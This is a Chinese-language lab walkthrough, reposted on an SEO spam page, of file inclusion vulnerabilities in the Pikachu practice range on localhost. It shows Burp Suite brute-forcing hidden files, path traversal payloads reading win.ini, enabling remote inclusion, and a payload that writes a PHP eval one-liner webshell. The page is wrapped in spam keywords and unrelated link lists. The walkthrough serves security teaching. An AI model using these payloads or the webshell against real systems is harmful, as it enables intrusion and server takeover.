当前位置: 首页 > news >正文

一个人做网站设计兼职sem是什么方法

一个人做网站设计兼职,sem是什么方法,wordpress页面编辑插件,免费做网站怎么做网站参考借鉴 Pikachu靶场之文件包含漏洞详解_pikachu文件包含-CSDN博客 文件包含(CTF教程,Web安全渗透入门)__bilibili File Inclusion(local) 查找废弃隐藏文件 随机选一个然后提交查询 URL中出现filenamefile2.php filename是file2.php&…

参考借鉴

Pikachu靶场之文件包含漏洞详解_pikachu文件包含-CSDN博客

文件包含(CTF教程,Web安全渗透入门)__bilibili

File Inclusion(local) 

查找废弃隐藏文件

随机选一个然后提交查询

URL中出现filename=file2.php

 filename是file2.php,其他文件名可能是filex.php(x是数字)

发现文件名确实是file1.php~file5.php

这套文件里可能有废弃或者隐藏的文件,用burpsuite进行爆破

爆破位置设置为文件名中的数字

payload设置为Numbers,从6到100,步长为1,然后攻击

不同长度的结果有三个,分别代表file6.php、file7.php、file10.php

把上面四个文件名都在浏览器地址栏试一下

发现file6.php是个包含用户名和密码的隐藏文件

file7.php返回了报错,通过这个报错可以知道,文件包含的函数是include()以及包含的文件路径,file10.php也是如此

        

读取不同文件夹文件

由上图可以看出网站根目录是:E:\phpStudy\phpstudy_pro\WWW\     

在此目录下写入一个shell.txt格式的php代码

内容为:<? phpinfo();?>

由于路径参数中有个固定的include/,因此就不能用绝对路径,结合报错信息中泄露的结合报错信息中泄露的fi_local.php文件位置,算出相对路径为 ../../../shell.txt

payload:

http://127.0.0.1/vul/fileinclude/fi_local.php?filename=../../../shell.txt&submit=提交查询

成功读取文件 

         

读取系统文件

结合报错信息中泄露的fi_local.php文件位置,算出相对路径为 C:/../../../../windows/win.ini

payload:

http://127.0.0.1/vul/fileinclude/fi_local.php?filename=C:/../../../../Windows/win.ini&submit=提交查询

成功读取文件 

                

File Inclusion(remote)

allow_url_include=On

修改该目录下的文件  phpstudy_pro\Extensions\php\php7.3.4nts\php.ini

修改文件

重启服务 

测试本地文件包含

发现url中把include()函数的完整参数给出来了,所以除了远程文件包含,

还可以本地文件包含,使用绝对路径

将filename更改为上一关创建的shell.txt的绝对路径

成功读取文件

        

包含有木马的文件

在fi_remote.php文件的同级目录下新建一个文件shell.php,并将一句话木马写入shell.php,将上题添加的shell.txt的文件内容更改为:

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[caker])  ?> ' ); ?>

payload:

http://127.0.0.1/vul/fileinclude/fi_remote.php?filename=E:\phpStudy\phpstudy_pro\WWW\shell.txt&submit=提交查询

没有回显 

目录查看发现shell.php已经写入, 可以用蚁剑进行连接

http://www.yidumall.com/news/86088.html

相关文章:

  • 凡客网站可以建设会员系统吗推广策略都有哪些
  • 2008iis搭建网站启信聚客通网络营销策划
  • 怎么把网站做seo到首页收录好的网站有哪些
  • 响应式网站建设公司‘营销自动化
  • 宾爵手表官方网站公司注册流程
  • 广州市政府门户网站建议小学生简短小新闻摘抄
  • 电子网站模板长沙seo代理
  • html做网站怎么链接音乐推广普通话绘画
  • 做众筹网站怎么赚钱网站安全检测
  • 新手做亚马逊要逛哪些网站360推广登录平台
  • 香港房地产网站站长全网指数查询
  • 财经网站建设湛江今日头条新闻
  • wordpress抓取微信文章seo优化培训课程
  • 西安微信网站开发青岛官网优化
  • 站长工具 怎么做网站地图seo排名的影响因素有哪些
  • 网站怎么盈利最近国际时事热点事件
  • 网站中的表单怎么做怎么建网站教程图解
  • 用nas建设服务器网站百度推广管家登录
  • 网站模板怎么做下载百度手机助手
  • 代驾软件开发流程seo公司发展前景
  • 杭州建设主管部门的网站关键词优化工具有哪些
  • 海外注册域名的网站员工培训
  • 专业制作pptseo快速推广
  • 网站系统维护一个月正常吗网站的seo方案
  • 网站需要网监备案seo引擎搜索网站关键词
  • 深圳建设网站公百度网
  • 9377游戏官网seo全网优化指南
  • 做网站如何规避法律风险上海网络推广外包公司
  • 网站收录提交接口推广手段和渠道有哪些
  • dede可以做商城网站吗免费的网站推广方法